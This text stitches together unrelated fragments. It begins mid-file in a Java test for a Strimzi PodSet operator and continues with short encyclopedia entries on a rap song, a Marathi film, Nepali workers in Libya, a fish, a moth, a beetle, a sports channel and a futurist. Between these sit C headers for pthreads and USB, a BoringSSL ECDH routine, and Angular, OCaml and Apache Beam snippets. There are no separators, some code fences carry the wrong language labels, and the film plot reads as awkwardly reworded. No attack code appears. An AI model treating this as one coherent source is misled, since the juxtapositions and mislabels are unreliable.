.withNewStatus() .withPods(1) .withCurrentPods(1) .withReadyPods(1) .endStatus() .build(); } @SuppressWarnings("unchecked") @Override protected StrimziPodSet getResourceWithModifications(StrimziPodSet resourceInCluster) { Pod pod = new PodBuilder() .withNewMetadata() .withName("broker2") .withLabels(Map.of("role", "broker")) .endMetadata() .withNewSpec() .withContainers(new ContainerBuilder().withName("broker").withImage("kafka:latest").build()) .endSpec() .build(); return new StrimziPodSetBuilder(resourceInCluster) .editSpec() .addToPods(mapper.convertValue(pod, new TypeReference<Map<String, Object>>() { })) .endSpec() .build(); } @Override protected StrimziPodSet getResourceWithNewReadyStatus(StrimziPodSet resourceInCluster) { return new StrimziPodSetBuilder(resourceInCluster) .withNewStatus() .withPods(1) .withCurrentPods(1) .withReadyPods(1) .endStatus() .build(); } @Override protected void assertReady(VertxTestContext context, StrimziPodSet resource) { context.verify(() -> { int replicas = resource.getSpec().getPods().size(); assertThat(resource.getStatus() != null && replicas == resource.getStatus().getPods() && replicas == resource.getStatus().getCurrentPods() && replicas == resource.getStatus().getReadyPods(), is(true)); }); } @Test public void testCreateSucceeds(VertxTestContext context) { String resourceName = getResourceName(RESOURCE_NAME); Checkpoint async = context.checkpoint(); String namespace = getNamespace(); StrimziPodSetOperator op = operator(); LOGGER.info("Creating resource"); op.reconcile(Reconciliation.DUMMY_RECONCILIATION, namespace, resourceName, getResource(resourceName)) .onComplete(context.succeeding(i -> { })) .compose(rrModified -> { LOGGER.info("Deleting resource"); return op.reconcile(Reconciliation.DUMMY_RECONCILIATION, namespace, resourceName, null); }) .onComplete(context.succeeding(rrDeleted -> async.flag())); } @Test public void testUpdateStatus(VertxTestContext context) { String resourceName = getResourceName(RESOURCE_NAME); Checkpoint async = context.checkpoint(); String namespace = getNamespace(); StrimziPodSetOperator op = operator(); LOGGER.info("Creating resource"); op.reconcile(Reconciliation.DUMMY_RECONCILIATION, namespace, resourceName, getResource(resourceName)) .onComplete(context.succeeding(i -> { })) .compose(i -> op.getAsync(namespace, resourceName)) // We need to get it again because of the faked readiness which would cause 409 error .onComplete(context.succeeding(i -> { })) .compose(resource -> { StrimziPodSet newStatus = getResourceWithNewReadyStatus(resource); LOGGER.info("Updating resource status"); return op.updateStatusAsync(Reconciliation.DUMMY_RECONCILIATION, newStatus); }) .onComplete(context.succeeding(i -> { })) .compose(rrModified -> op.getAsync(namespace, resourceName)) .onComplete(context.succeeding(modifiedCustomResource -> context.verify(() -> assertReady(context, modifiedCustomResource)))) .compose(rrModified -> { LOGGER.info("Deleting resource"); return op.reconcile(Reconciliation.DUMMY_RECONCILIATION, namespace, resourceName, null); }) .onComplete(context.succeeding(rrDeleted -> async.flag())); } /** * Tests what happens when the resource is deleted while updating the status. * * The CR removal does not consistently complete within the default timeout. * This requires increasing the timeout for completion to 1 minute. * * @param context Test context */ @Test @Timeout(value = 1, timeUnit = TimeUnit.MINUTES) public void your_sha256_hashion(VertxTestContext context) { String resourceName = getResourceName(RESOURCE_NAME); Checkpoint async = context.checkpoint(); String namespace = getNamespace(); StrimziPodSetOperator op = operator(); AtomicReference<StrimziPodSet> newStatus = new AtomicReference<>(); LOGGER.info("Creating resource"); op.reconcile(Reconciliation.DUMMY_RECONCILIATION, namespace, resourceName, getResource(resourceName)) .onComplete(context.succeeding(i -> { })) .compose(rr -> { LOGGER.info("Saving resource with status change prior to deletion"); newStatus.set(getResourceWithNewReadyStatus(op.get(namespace, resourceName))); LOGGER.info("Deleting resource"); return op.reconcile(Reconciliation.DUMMY_RECONCILIATION, namespace, resourceName, null); }) .onComplete(context.succeeding(i -> { })) .compose(i -> { LOGGER.info("Updating resource with new status - should fail"); return op.updateStatusAsync(Reconciliation.DUMMY_RECONCILIATION, newStatus.get()); }) .onComplete(context.failing(e -> context.verify(() -> { assertThat(e, instanceOf(KubernetesClientException.class)); async.flag(); }))); } /** * Tests what happens when the resource is modified while updating the status * * @param context Test context */ @Test public void testUpdateStatusAfterResourceUpdated(VertxTestContext context) { String resourceName = getResourceName(RESOURCE_NAME); Checkpoint async = context.checkpoint(); String namespace = getNamespace(); StrimziPodSetOperator op = operator(); Promise<Void> updateStatus = Promise.promise(); //readinessHelper(op, namespace, resourceName); // Required to be able to create the resource LOGGER.info("Creating resource"); op.reconcile(Reconciliation.DUMMY_RECONCILIATION, namespace, resourceName, getResource(resourceName)) .onComplete(context.succeeding(i -> { })) .compose(rrCreated -> { StrimziPodSet updated = getResourceWithModifications(rrCreated.resource()); StrimziPodSet newStatus = getResourceWithNewReadyStatus(rrCreated.resource()); LOGGER.info("Updating resource (mocking an update due to some other reason)"); op.operation().inNamespace(namespace).withName(resourceName).patch(updated); LOGGER.info("Updating resource status after underlying resource has changed"); return op.updateStatusAsync(Reconciliation.DUMMY_RECONCILIATION, newStatus); }) .onComplete(context.failing(e -> context.verify(() -> { LOGGER.info("Failed as expected"); assertThat(e, instanceOf(KubernetesClientException.class)); assertThat(((KubernetesClientException) e).getCode(), Matchers.is(409)); updateStatus.complete(); }))); updateStatus.future() .compose(v -> { LOGGER.info("Deleting resource"); return op.reconcile(Reconciliation.DUMMY_RECONCILIATION, namespace, resourceName, null); }) .onComplete(context.succeeding(v -> async.flag())); } } ```
"Dedication" is a song by American rapper Nipsey Hussle, released on February 13, 2018 as the third single from his debut studio album Victory Lap (2018). The song features American rapper Kendrick Lamar. It was produced by Mike & Keys, Rance and Mars of 1500 or Nothin', Ralo Stylez and Axl Folie. Background Nipsey Hussle premiered the song on Zane Lowe's Beats 1 radio show. He said, "I think that record sums up the marathon and the idea of Victory Lap. I think that in three minutes, [I] hit every point that I want to represent musically and just as an artist." He revealed he told his team to send his record "Keys 2 The City 2" to Kendrick Lamar, but instead they sent "Dedication" to Lamar. Hussle did not know that until Lamar told him about it when they met at the premiere of the film All Eyez on Me. Hussle stated: I'm like damn I ain't even send that. But he sent it back and when I heard the verse I was really inspired. I felt like he killed it. He talked about something that happened the night of the Pac premiere. If you really listen to his verse, he's talking about me, Snoop Dogg, Top Dawg, and himself. We really had a convo. We had a conversation about just L.A. streets and about how the time might be right right now for us to really try to use our influence to evolve how we exist. From Bloods and Crips, just the tribalism that's going on out there. We were just wondering, we just had an honest convo like what y'all think? Is it time for us to really start that narrative off? And he speaks about that in his verse. Composition The song sees the rappers reflecting on the role of dedication, hard work and patience in their successes, over synth production that is reminiscent of West Coast hip hop and gangsta rap. Nipsey Hussle raps about working to bring unity in the streets, while Kendrick Lamar details his rise to success in his career. Charts Certifications References 2018 singles 2018 songs Nipsey Hussle songs Kendrick Lamar songs Songs written by Kendrick Lamar Songs written by Larrance Dopson Songs written by Nipsey Hussle Songs written by Lamar Edwards
```objective-c /* * Module: sched.h * * Purpose: * Provides an implementation of POSIX realtime extensions * as defined in * * POSIX 1003.1b-1993 (POSIX.1b) * * your_sha256_hash---------- * * Pthreads-win32 - POSIX Threads Library for Win32 * * Contact Email: rpj@callisto.canberra.edu.au * * The current list of contributors is contained * in the file CONTRIBUTORS included with the source * code distribution. The list can also be seen at the * following World Wide Web location: * path_to_url * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * * You should have received a copy of the GNU Lesser General Public * if not, write to the Free Software Foundation, Inc., * 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA */ #if !defined(_SCHED_H) #define _SCHED_H #undef PTW32_SCHED_LEVEL #if defined(_POSIX_SOURCE) #define PTW32_SCHED_LEVEL 0 /* Early POSIX */ #endif #if defined(_POSIX_C_SOURCE) && _POSIX_C_SOURCE >= 199309 #undef PTW32_SCHED_LEVEL #define PTW32_SCHED_LEVEL 1 /* Include 1b, 1c and 1d */ #endif #if defined(INCLUDE_NP) #undef PTW32_SCHED_LEVEL #define PTW32_SCHED_LEVEL 2 /* Include Non-Portable extensions */ #endif #define PTW32_SCHED_LEVEL_MAX 3 #if ( defined(_POSIX_C_SOURCE) && _POSIX_C_SOURCE >= 200112 ) || !defined(PTW32_SCHED_LEVEL) #define PTW32_SCHED_LEVEL PTW32_SCHED_LEVEL_MAX /* Include everything */ #endif #if defined(__GNUC__) && !defined(__declspec) # error Please upgrade your GNU compiler to one that supports __declspec. #endif /* * When building the library, you should define PTW32_BUILD so that * the variables/functions are exported correctly. When using the library, * do NOT define PTW32_BUILD, and then the variables/functions will * be imported correctly. */ #if !defined(PTW32_STATIC_LIB) # if defined(PTW32_BUILD) # define PTW32_DLLPORT __declspec (dllexport) # else # define PTW32_DLLPORT __declspec (dllimport) # endif #else # define PTW32_DLLPORT #endif /* * This is a duplicate of what is in the autoconf config.h, * which is only used when building the pthread-win32 libraries. */ #if !defined(PTW32_CONFIG_H) # if defined(WINCE) # define NEED_ERRNO # define NEED_SEM # endif # if defined(__MINGW64__) # define HAVE_STRUCT_TIMESPEC # define HAVE_MODE_T # elif defined(_UWIN) || defined(__MINGW32__) # define HAVE_MODE_T # endif #endif /* * */ #if PTW32_SCHED_LEVEL >= PTW32_SCHED_LEVEL_MAX #if defined(NEED_ERRNO) #include "need_errno.h" #else #include <errno.h> #endif #endif /* PTW32_SCHED_LEVEL >= PTW32_SCHED_LEVEL_MAX */ #if (defined(__MINGW64__) || defined(__MINGW32__)) || defined(_UWIN) # if PTW32_SCHED_LEVEL >= PTW32_SCHED_LEVEL_MAX /* For pid_t */ # include <sys/types.h> /* Required by Unix 98 */ # include <time.h> # else typedef int pid_t; # endif #else typedef int pid_t; #endif /* Thread scheduling policies */ enum { SCHED_OTHER = 0, SCHED_FIFO, SCHED_RR, SCHED_MIN = SCHED_OTHER, SCHED_MAX = SCHED_RR }; struct sched_param { int sched_priority; }; #if defined(__cplusplus) extern "C" { #endif /* __cplusplus */ PTW32_DLLPORT int __cdecl sched_yield (void); PTW32_DLLPORT int __cdecl sched_get_priority_min (int policy); PTW32_DLLPORT int __cdecl sched_get_priority_max (int policy); PTW32_DLLPORT int __cdecl sched_setscheduler (pid_t pid, int policy); PTW32_DLLPORT int __cdecl sched_getscheduler (pid_t pid); /* * Note that this macro returns ENOTSUP rather than * ENOSYS as might be expected. However, returning ENOSYS * should mean that sched_get_priority_{min,max} are * not implemented as well as sched_rr_get_interval. * This is not the case, since we just don't support * round-robin scheduling. Therefore I have chosen to * return the same value as sched_setscheduler when * SCHED_RR is passed to it. */ #define sched_rr_get_interval(_pid, _interval) \ ( errno = ENOTSUP, (int) -1 ) #if defined(__cplusplus) } /* End of extern "C" */ #endif /* __cplusplus */ #undef PTW32_SCHED_LEVEL #undef PTW32_SCHED_LEVEL_MAX #endif /* !_SCHED_H */ ```
```c /* ==================================================================== * * The Elliptic Curve Public-Key Crypto Library (ECC Code) included * herein is developed by SUN MICROSYSTEMS, INC., and is contributed * to the OpenSSL project. * * The ECC Code is licensed pursuant to the OpenSSL open source * license provided below. * * The ECDH software is originally written by Douglas Stebila of * Sun Microsystems Laboratories. * */ /* ==================================================================== * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (path_to_url" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * licensing@OpenSSL.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (path_to_url" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). */ #include <openssl/ecdh.h> #include <string.h> #include <openssl/ec.h> #include <openssl/ec_key.h> #include <openssl/err.h> #include <openssl/mem.h> #include <openssl/sha.h> #include "../../internal.h" #include "../ec/internal.h" #include "../service_indicator/internal.h" int ECDH_compute_key_fips(uint8_t *out, size_t out_len, const EC_POINT *pub_key, const EC_KEY *priv_key) { boringssl_ensure_ecc_self_test(); if (priv_key->priv_key == NULL) { OPENSSL_PUT_ERROR(ECDH, ECDH_R_NO_PRIVATE_VALUE); return 0; } const EC_SCALAR *const priv = &priv_key->priv_key->scalar; const EC_GROUP *const group = EC_KEY_get0_group(priv_key); if (EC_GROUP_cmp(group, pub_key->group, NULL) != 0) { OPENSSL_PUT_ERROR(EC, EC_R_INCOMPATIBLE_OBJECTS); return 0; } EC_JACOBIAN shared_point; uint8_t buf[EC_MAX_BYTES]; size_t buflen; if (!ec_point_mul_scalar(group, &shared_point, &pub_key->raw, priv) || !ec_get_x_coordinate_as_bytes(group, buf, &buflen, sizeof(buf), &shared_point)) { OPENSSL_PUT_ERROR(ECDH, ECDH_R_POINT_ARITHMETIC_FAILURE); return 0; } FIPS_service_indicator_lock_state(); switch (out_len) { case SHA224_DIGEST_LENGTH: SHA224(buf, buflen, out); break; case SHA256_DIGEST_LENGTH: SHA256(buf, buflen, out); break; case SHA384_DIGEST_LENGTH: SHA384(buf, buflen, out); break; case SHA512_DIGEST_LENGTH: SHA512(buf, buflen, out); break; default: OPENSSL_PUT_ERROR(ECDH, ECDH_R_UNKNOWN_DIGEST_LENGTH); FIPS_service_indicator_unlock_state(); return 0; } FIPS_service_indicator_unlock_state(); ECDH_verify_service_indicator(priv_key); return 1; } ```
```xml import { Component } from '@angular/core'; @Component({ selector: 'team', templateUrl: './team.component.html' }) export class TeamComponent {} ```
```python Following PEP 8 styling guideline. Built-in `list` methods `del` statement for lists Your own Python `calendar` When `range` comes in handy ```
Dombivli Fast () is a 2005 Indian Marathi-language drama film directed by Nishikanth Kamat. It is the story of a middle class bank employee, Madhav Apte, an ordinary, law-abiding and honest citizen who faces constant frustration with the injustice and corruption that pervades in all walks of his life. The film portrays Apte's mental breakdown as he reaches his breaking point, and his rampage as a vigilante across Mumbai to set things right. The film stars Sandeep Kulkarni in the lead with Shilpa Tulaskar and Sandesh Jadhav. The film bears resemblance to the 1993 Hollywood film Falling Down, starring Michael Douglas. Kamat remade the film in Tamil as Evano Oruvan with R. Madhavan playing the lead in the year 2007. Plot Madhav Apte lives a lower-middle-class life in Dombivli area of Mumbai together with his wife Alka, son Rahul and daughter Prachi. He travels to his workplace, Nariman Point, each day by train; and takes the Dombivli Fast local train to return home. Cheating, corruption, and dishonesty are something which he hated the foremost. He was a person with strong morals and principle, and lived life in step with it. Wherever he would see injustice and corruption, he would fight and argue; be it along with his wife or his daughter's educator or perhaps his boss. Alka was jaded with Madhav's adamant behavior and in a very fit of anger, had told him that his values and morals are only worth something if he can bring a change in society. Little did Alka know that her words would make a robust impact on Madhav! Then started the fight of Madhav against everyone who broke the foundations and was on the incorrect side of the law. Soon, his actions shook the complete city and brought a substantial change too. But how long will society allow Madhav to bring this change? And till what extent will Madhav achieve bringing a change? He's pushed to a corner by everybody who finds his path of righteousness too difficult to handle, and in some unspecified time in the future, he snaps. He goes on a rampage trying to correct everything that goes against his principles, and so starts mayhem on the streets of Mumbai, ultimately ending in a very tragic climax with him getting encountered. Cast Sandeep Kulkarni as Madhav Apte Shilpa Tulaskar as Alka Apte, Madhav's wife Dushyant Wagh as Rahul Apte, Madhav's son Sandesh Jadhav as Insp. Subhash Anaspure Srushti Bhokse as Prachi Madhav Apte, Madhav Apte's daughter Chandrakant Gokhale as Keshav Joshi, Patient Relative in Hospital (Guest Role) Harshada Khanvilkar as Women speaker Balkrishna Shinde - Actor guest appearance Awards 2006 Star Screen Awards - Best Actor Male (Marathi) - Sandeep Kulkarni 2006 Asian Festival of First Films - Best Director(Swarovski Trophy) - Nishikant Kamat 2006 Indian Film Festival of Los Angeles - Best Film(Jury Award) 2006 National Film Awards - Best Feature Film in Marathi(Silver Lotus Award) 2006 Pune International Film Festival - Best Marathi Film (Sant Tukaram award from the Government of Maharashtra) See also Evano Oruvan Falling Down References External links New York Times Review of 'Dombivli Fast' 2000s Marathi-language films Indian vigilante films 2005 films Films set in Mumbai Marathi films remade in other languages Best Marathi Feature Film National Film Award winners Films directed by Nishikant Kamat
Nepalis in Libya are mainly migrant workers from Nepal. According to Nepal's Ministry of Foreign Affairs, in February 2011 there were 3,064 Nepalis working in Libya. Overview The majority of Nepalese workers in Libya work as construction or industrial laborers. The Nepalese government has opened Libya for foreign employment in 2009 and about six Nepalese outsourcing agencies have sent 1,868 Nepalis to Libya while 22 have reached there through individual contracts. Department of Foreign Employment data showed that 2,592 Nepalis reached the country in the two years to 2011. Following the 2011 Libyan civil war, many Nepalese workers began to leave the country. About 1,200 Nepalis had already left Libya according to the Nepal Foreign Employment Association. Many of them left the country through Egypt by reaching the border from Derna under a rescue effort coordinated by Nepal’s envoy in Cairo. See also Nepalis in Saudi Arabia Hinduism in Libya Buddhism in Libya References Ethnic groups in Libya Libya
```ocaml open Import (** Command to print solver environment *) val command : unit Cmd.t ```
```objective-c /* * SPDX-FileContributor: 2016 Intel Corporation * * * LPCUSB, an USB device driver for LPC microcontrollers */ /** * @file * @brief USB device core layer APIs and structures * * This file contains the USB device core layer APIs and structures. */ #pragma once #include <stddef.h> #include <sys/cdefs.h> #include "usb_dc.h" #include "esp_assert.h" #ifdef __cplusplus extern "C" { #endif /************************************************************************* * USB configuration **************************************************************************/ #define MAX_PACKET_SIZE0 64 /**< maximum packet size for EP 0 */ //Note: for FS this should be 8, 16, 32, 64 bytes. HS can go up to 512. /************************************************************************* * USB application interface **************************************************************************/ /** setup packet definitions */ struct usb_setup_packet { uint8_t bmRequestType; /**< characteristics of the specific request */ uint8_t bRequest; /**< specific request */ uint16_t wValue; /**< request specific parameter */ uint16_t wIndex; /**< request specific parameter */ uint16_t wLength; /**< length of data transferred in data phase */ } __packed; ESP_STATIC_ASSERT(sizeof(struct usb_setup_packet) == 8, "USB setup packet struct size error"); /** * Callback function signature for the device */ typedef void (*usb_status_callback)(enum usb_dc_status_code status_code, uint8_t *param); /** * Callback function signature for the USB Endpoint status */ typedef void (*usb_ep_callback)(uint8_t ep, enum usb_dc_ep_cb_status_code cb_status); /** * Function which handles Class specific requests corresponding to an * interface number specified in the device descriptor table */ typedef int (*usb_request_handler) (struct usb_setup_packet *detup, int32_t *transfer_len, uint8_t **payload_data); /** * Function for interface runtime configuration */ typedef void (*usb_interface_config)(uint8_t bInterfaceNumber); /* * USB Endpoint Configuration */ struct usb_ep_cfg_data { /** * Callback function for notification of data received and * available to application or transmit done, NULL if callback * not required by application code */ usb_ep_callback ep_cb; /** * The number associated with the EP in the device configuration * structure * IN EP = 0x80 | \<endpoint number\> * OUT EP = 0x00 | \<endpoint number\> */ uint8_t ep_addr; }; /** * USB Interface Configuration */ struct usb_interface_cfg_data { /** Handler for USB Class specific Control (EP 0) communications */ usb_request_handler class_handler; /** Handler for USB Vendor specific commands */ usb_request_handler vendor_handler; /** * The custom request handler gets a first chance at handling * the request before it is handed over to the 'chapter 9' request * handler */ usb_request_handler custom_handler; /** * This data area, allocated by the application, is used to store * Class specific command data and must be large enough to store the * largest payload associated with the largest supported Class' * command set. This data area may be used for USB IN or OUT * communications */ uint8_t *payload_data; /** * This data area, allocated by the application, is used to store * Vendor specific payload */ uint8_t *vendor_data; }; /* * @brief USB device configuration * * The Application instantiates this with given parameters added * using the "usb_set_config" function. Once this function is called * changes to this structure will result in undefined behaviour. This structure * may only be updated after calls to usb_deconfig */ struct usb_cfg_data { /** * USB device description, see * path_to_url#DeviceDescriptors */ const uint8_t *usb_device_description; /** Pointer to interface descriptor */ const void *interface_descriptor; /** Function for interface runtime configuration */ usb_interface_config interface_config; /** Callback to be notified on USB connection status change */ usb_status_callback cb_usb_status; /** USB interface (Class) handler and storage space */ struct usb_interface_cfg_data interface; /** Number of individual endpoints in the device configuration */ uint8_t num_endpoints; /** * Pointer to an array of endpoint structs of length equal to the * number of EP associated with the device description, * not including control endpoints */ struct usb_ep_cfg_data *endpoint; }; /* * @brief configure USB controller * * Function to configure USB controller. * Configuration parameters must be valid or an error is returned * * @param[in] config Pointer to configuration structure * * @return 0 on success, negative errno code on fail */ int usb_set_config(struct usb_cfg_data *config); /* * @brief return the USB device to it's initial state * * @return 0 on success, negative errno code on fail */ int usb_deconfig(void); /* * @brief enable USB for host/device connection * * Function to enable USB for host/device connection. * Upon success, the USB module is no longer clock gated in hardware, * it is now capable of transmitting and receiving on the USB bus and * of generating interrupts. * * @return 0 on success, negative errno code on fail. */ int usb_enable(struct usb_cfg_data *config); /* * @brief disable the USB device. * * Function to disable the USB device. * Upon success, the specified USB interface is clock gated in hardware, * it is no longer capable of generating interrupts. * * @return 0 on success, negative errno code on fail */ int usb_disable(void); /* * @brief Check if a write to an in ep would block until there is enough space * in the fifo * * @param[in] ep Endpoint address corresponding to the one listed in the * device configuration table * * @return 0 if free to write, 1 if a write would block, negative errno code on fail */ int usb_write_would_block(uint8_t ep); /* * @brief write data to the specified endpoint * * Function to write data to the specified endpoint. The supplied * usb_ep_callback will be called when transmission is done. * * @param[in] ep Endpoint address corresponding to the one listed in the * device configuration table * @param[in] data Pointer to data to write * @param[in] data_len Length of data requested to write. This may be zero for * a zero length status packet. * @param[out] bytes_ret Bytes written to the EP FIFO. This value may be NULL if * the application expects all bytes to be written * * @return 0 on success, negative errno code on fail */ int usb_write(uint8_t ep, const uint8_t *data, uint32_t data_len, uint32_t *bytes_ret); /* * @brief read data from the specified endpoint * * This function is called by the Endpoint handler function, after an * OUT interrupt has been received for that EP. The application must * only call this function through the supplied usb_ep_callback function. * * @param[in] ep Endpoint address corresponding to the one listed in * the device configuration table * @param[in] data Pointer to data buffer to write to * @param[in] max_data_len Max length of data to read * @param[out] ret_bytes Number of bytes read. If data is NULL and * max_data_len is 0 the number of bytes available * for read is returned. * * @return 0 on success, negative errno code on fail */ int usb_read(uint8_t ep, uint8_t *data, uint32_t max_data_len, uint32_t *ret_bytes); /* * @brief set STALL condition on the specified endpoint * * This function is called by USB device class handler code to set stall * condition on endpoint. * * @param[in] ep Endpoint address corresponding to the one listed in * the device configuration table * * @return 0 on success, negative errno code on fail */ int usb_ep_set_stall(uint8_t ep); /* * @brief clears STALL condition on the specified endpoint * * This function is called by USB device class handler code to clear stall * condition on endpoint. * * @param[in] ep Endpoint address corresponding to the one listed in * the device configuration table * * @return 0 on success, negative errno code on fail */ int usb_ep_clear_stall(uint8_t ep); /** * @brief read data from the specified endpoint * * This is similar to usb_ep_read, the difference being that, it doesn't * clear the endpoint NAKs so that the consumer is not bogged down by further * upcalls till he is done with the processing of the data. The caller should * reactivate ep by invoking usb_ep_read_continue() do so. * * @param[in] ep Endpoint address corresponding to the one * listed in the device configuration table * @param[in] data pointer to data buffer to write to * @param[in] max_data_len max length of data to read * @param[out] read_bytes Number of bytes read. If data is NULL and * max_data_len is 0 the number of bytes * available for read should be returned. * * @return 0 on success, negative errno code on fail. */ int usb_ep_read_wait(uint8_t ep, uint8_t *data, uint32_t max_data_len, uint32_t *read_bytes); /** * @brief Continue reading data from the endpoint * * Clear the endpoint NAK and enable the endpoint to accept more data * from the host. Usually called after usb_ep_read_wait() when the consumer * is fine to accept more data. Thus these calls together acts as flow control * mechanism. * * @param[in] ep Endpoint address corresponding to the one * listed in the device configuration table * * @return 0 on success, negative errno code on fail. */ int usb_ep_read_continue(uint8_t ep); /** * Callback function signature for transfer completion. */ typedef void (*usb_transfer_callback)(uint8_t ep, int tsize, void *priv); /* USB transfer flags */ #define USB_TRANS_READ BIT(0) /** Read transfer flag */ #define USB_TRANS_WRITE BIT(1) /** Write transfer flag */ #define USB_TRANS_NO_ZLP BIT(2) /** No zero-length packet flag */ /** * @brief Transfer management endpoint callback * * If a USB class driver wants to use high-level transfer functions, driver * needs to register this callback as usb endpoint callback. */ void usb_transfer_ep_callback(uint8_t ep, enum usb_dc_ep_cb_status_code); /** * @brief Start a transfer * * Start a usb transfer to/from the data buffer. This function is asynchronous * and can be executed in IRQ context. The provided callback will be called * on transfer completion (or error) in thread context. * * @param[in] ep Endpoint address corresponding to the one * listed in the device configuration table * @param[in] data Pointer to data buffer to write-to/read-from * @param[in] dlen Size of data buffer * @param[in] flags Transfer flags (USB_TRANS_READ, USB_TRANS_WRITE...) * @param[in] cb Function called on transfer completion/failure * @param[in] priv Data passed back to the transfer completion callback * * @return 0 on success, negative errno code on fail. */ int usb_transfer(uint8_t ep, uint8_t *data, size_t dlen, unsigned int flags, usb_transfer_callback cb, void *priv); /** * @brief Start a transfer and block-wait for completion * * Synchronous version of usb_transfer, wait for transfer completion before * returning. * * @param[in] ep Endpoint address corresponding to the one * listed in the device configuration table * @param[in] data Pointer to data buffer to write-to/read-from * @param[in] dlen Size of data buffer * @param[in] flags Transfer flags * * @return number of bytes transferred on success, negative errno code on fail. */ int usb_transfer_sync(uint8_t ep, uint8_t *data, size_t dlen, unsigned int flags); /** * @brief Cancel any ongoing transfer on the specified endpoint * * @param[in] ep Endpoint address corresponding to the one * listed in the device configuration table * * @return 0 on success, negative errno code on fail. */ void usb_cancel_transfer(uint8_t ep); /** * @brief Provide IDF with an interface to clear the static variable usb_dev * * */ void usb_dev_deinit(void); void usb_dev_resume(int configuration); int usb_dev_get_configuration(void); #ifdef __cplusplus } #endif ```
Pempheris rochai, commonly known as Rocha's sweeper, is a species of sweeper fish of the family Pempheridae. It's found in the northern Indian Ocean, on shallow reefs along the coast of Oman. Etymology It was named after Luiz A. Rocha to honor his contributions to ichthyology. References rochai Taxa named by John Ernest Randall Taxa named by Benjamin C. Victor Fish of the Middle East
SportPlus is a Greek language sports channel that airs the best sporting leagues and competitions from Greece. It is the first 24-hour sports channel in the world aimed at the Greek diaspora. SportPlus airs live and tape delayed matches from Greek Super League, Football League and Basket League. It also airs news and highlights shows. Availability SportPlus originally launched on 24 August 2014 in the United States on Dish Network. It subsequently launched in Australia on the MySat platform. On 26 March 2015, SportPlus launched in Canada on Bell Fibe TV via a partnership with Odyssey Television Network. External links Official site Television channels in Greece Greek-language television stations Television channels and stations established in 2014
Patrick M. Gunkel (1947 – 2017) was an American futurist and independent scholar best known as the originator of "ideonomy", a combinatorial "science of ideas". Although he never completed a degree, his career included positions at the Hudson Institute, MIT, and the University of Texas. Guido Enthoven describes Gunkel's ideonomy as one of three pioneering attempts to create a science of ideas (the others being Antoine Destutt de Tracy's original notion of ideology and Genrich Altshuller’s TRIZ "system of inventive problem solving"), while Marvin Minsky described ideonomy as "perhaps the most extensive study of ways to generate ideas". An archive of his works was assembled by Whitman Richards. References 1947 births 2017 deaths American futurologists Independent scholars
```java /* * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * * path_to_url * * Unless required by applicable law or agreed to in writing, software * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. */ package org.apache.beam.sdk.extensions.sql.meta; import java.util.List; import org.apache.beam.vendor.calcite.v1_28_0.org.apache.calcite.rex.RexNode; /** * This default implementation of {@link BeamSqlTableFilter} interface. Assumes that predicate * push-down is not supported. */ public final class DefaultTableFilter implements BeamSqlTableFilter { private final List<RexNode> filters; public DefaultTableFilter(List<RexNode> filters) { this.filters = filters; } /** * Since predicate push-down is assumed not to be supported by default - return an unchanged list * of filters to be preserved. * * @return Predicate {@code List<RexNode>} which are not supported. To make a single RexNode * expression all of the nodes must be joined by a logical AND. */ @Override public List<RexNode> getNotSupported() { return filters; } @Override public int numSupported() { return 0; } } ```
Stigmella birgittae is a moth of the family Nepticulidae. It was described by Gustafsson in 1985. It is present in Gambia, Oman and Saudi Arabia. Description The wingspan is for males. The larvae feed on Ziziphus mauritiana and Ziziphus spina-christi. They mine the leaves of their host plant. The mine has the form of a gallery, and frequently also forms a small blotch through coalescence of the windings. The frass is deposited in a narrow central line. The larvae are yellowish green. When they leave the mine, they make a slit in the upper surface. References Nepticulidae Fauna of the Gambia Insects of the Arabian Peninsula Moths of Africa Moths of Asia Moths described in 1985
Elaphropus milneanus is a species of ground beetle in the subfamily Trechinae. It was described by Darlington in 1962. References Beetles described in 1962
